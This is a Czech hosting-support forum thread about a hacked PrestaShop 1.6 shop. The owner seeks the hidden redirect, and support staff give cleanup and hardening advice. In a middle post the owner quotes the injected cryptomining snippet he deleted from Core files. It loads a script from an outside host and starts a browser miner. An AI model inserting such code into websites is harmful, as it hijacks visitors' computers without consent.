PrestaShop 1.6 - Hacknuty web

muj web byl napaden.
mining script jsem ze souboru odstranil ale web stale neaktivni BO i FO. Vsiml jsem si ze pri loadingu po zprave handshake se zobrazi web ( stejny jako byl ve scriptu ) https://miao.wikaba.com ..na ktery se snazi pripojit.
Kde je ta radka ktera redirektuje jak v Front officu a i v Back Officu ? Nekde je to ulozeno a ja to nikde nemohu najit. v index.php to neni.

Prosim help!

update:
podarilo se mi rozchodit B Office promazanim vsech nahranych scriptu do php souboru. Stale nejde front office ale funguje "Rekonstrukce" / maintanance mode. Zjistil jsem datum a priblizny cas napadeni a podle toho se mi podarilo najit infikovane soubory, tim rozchodit ten back office. Bohuzel u template ( deafult bootstrap ) jsem vse prosel a nic nenasel. Neni nekde nejaky skryty faile nebo tak neco , co porad zkousi se pripojit na zmineny wikaba web? nebo zeby nekde v DB byla schovana radka?

Dobrý den,
zkuste web projít pomocí https://www.virustotal.com/#/home/upload a https://www.quttera.com/ . Pokud nepomůže, stáhněte obsah FTP k sobě na disk a projděte antivirem, měl by najít škodlivé patterny, resp. soubory, které je obsahují.

Dobrý den,

k dispozici případně máte 30denní zálohy webu i databáze, takže můžete porovnat obsah nebo data obnovit z nezavirované zálohy.

Dekuji,

Soubory ve kterych byl vepsany mining script jsou v zaloze netknute. Ale vypada to ze jsem nebyl schopen detekovat vse , nebot BO ktery jeste vcera fungoval , ted uz opet nejde a pres FTP nejsem schopen dohledat nove zasahy. Nejsou nikde viditelne prepisy. Nekde se to stale rozmnozuje a ja to nevidim.
virustotal pise ze jsem clean a quttera indentifikuje 1 soubor., nabizeji odstraneni za poplatek ale ne garanci ze web bude fungovat:-(

Zkusim obnovu ze zalohy.
Zajimalo by me jsetli existuje u nas nejaky servis ktery pomaha temto problemum predejit?
Dekuji

Dobrý den,

obecně platí, že tyto aplikace a jejich rozšíření je potřeba udržovat aktuální. Nové verze řeší nejenom funkční chyby starších verzí, ale také bezpečnostní. Rozšíření, která nepoužíváte, je nejlepší zcela odstranit. Bezpečnostní díra může být klidně i v nějaké nestandardní šabloně, takže používat pouze šablony z ověřených zdrojů a také je udržovat aktuální. Formuláře (např. kontaktní formulář, komentáře apod.) je nejlepší opatřit nějakou ochranou proti zneužití (např. captcha, bezpečnostní otázka apod.). A pak samozřejmě všude používat složitá hesla, tzn. pro FTP, databázi a účty. Pokud budete tato základní pravidla dodržovat, tak se nemůže stát, že Váš web někdo zneužije.

Dekuji za odpoved.

Ano, zapomnel jsem na Contac us , kde je mozno pripojit soubor ke zprave a tudiz i vir. Prihlaseni na ucet pouzivam potvrzeni emailem, ale uz jsem i stahl captcha modul. Ponaucen z predchozich nezdaru.
Ted jen cekam az me obnovite ze zalohy a budu se modlit aby vir uz nebyl zaklinen v zaloze. Nemam jak to proverit. Klasicky antivir stejne scanuje aplikace , ne weby
Vsiml jsem si ze sript ktery jsem vymazal se druhy den objevil znovu...takze nekde je funkcni / generujici script , ktery to generuje.
V zaloze jsem vygenerovane scripty nenasel a jak vypada ten generujici nevim a ani nevim kde hledat
Hesla jsem pozmenil na komplikovane a cekam na backup.

Dekuji.

Dobrý den,

případně můžete soubory porovnat ještě se soubory v originálním instalačním balíčku stejné verze aplikace (https://www.prestashop.com/en/previous-versions). Nežádoucí přesměrování by také mohlo být přímo v souboru .htaccess v kořenové složce instalace. Nebo by mohl útočník změnit adresu obchodu v databázi, takže ještě zkontrolujte nastavení adresy v administraci aplikace nebo přímo v databázi (viz PrestaShop - Konfigurační soubor > "Úprava adresy webu" nebo "Úprava adresy webu v databázi").

Diky za naopvedu,

settings.inc.php byl netknuty a v adminu sem byl jen chvily nez to zas cely spadlo. Vdobe kdy to jeste nejak fungovalo aspon vtom adminu, tak nesly zobarzovat poradne obednavky napriklad. Proste rozhozeny css styles , bila plocha a ve sloupcy syrovy udaje zakaznika ale bez produktu co objednal ...atd.
Po prvnim hacknuti jsem se do BOfficu dostal jen tak , ze jsem vymazal :

echo "<script src='https://miao.wikaba.com/jqueryeasyui.js'></script>
<script>
var uri = 'www';
var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
jqueryui.start();
}
</script>";

z nekolika souboru v Core adresari. To mi dalo nekolik hodin na to abych se podival do BO. Moc jsem to neresil nebot uz vte chvily jsem vedel ze to je na obnovu ze zalohy, ze to proste dohromady zpet nedam.

Podle me se utocnik dostal prednimi vratky a ne pres BO nebo FTP. Jestli to dobre chapu tak ukolem bylo odeslat urcita data na wikaba web ale soucastne se tvarit jako ze nic. Jenze tim ze google to vcas spacifikoval a data se nemela kam presunout , tak se to vratilo jako chyba a tudiz to spadlo. Otazkou je jak dlouho sem tam mel ten script ( jak dlouho web wikaba byl funkcni ) .
V Core adresari jsem akorat poznal soubory byli editovany 21.02 o proti ostanim puvodni instalace pred rokem nebo modifikace pred mnoha mesici.

htaccess ...sem porovnaval se zalohou, ale i tak jsem nevidel zadny odkaz na jiny web.

Co se porovnani webu s original balickem, to asi nebude tak snadne. Nejsem schopen stahnout web z FTP kompletne, porad pada pripojeni , pak se to zacykli a pise ze je mnoho pripojeni na raz a proste se to nikam nehejbe. Freezilla ( posledni verze ) na MACu ( Sierra posl.update ). 100M pripojeni.
Proto jsem poazdal zakaznickou podporu o obnoveni ze zalohy, nebot to proste nestahnu , nevim proc:-(
Databazy jsem jeste schopen stahnout, ale GB web bohuzel ne

Ocenil bych , kdyby slo premistovat zalohy na web prostor bez toho aniz bych to musel fyzicky stahovat na svuj disk. To by mi vytrhlo velky trn z paty:-)
Dekuji

Dobrý den,

bohužel s FTP klienty pro MAC nemám žádné zkušenosti. Ale pokud to klient umožňuje, tak v nastavení změňte režim přenosu na aktivní nebo naopak na pasivní. Případně zkuste použít úplně jiného FTP klienta.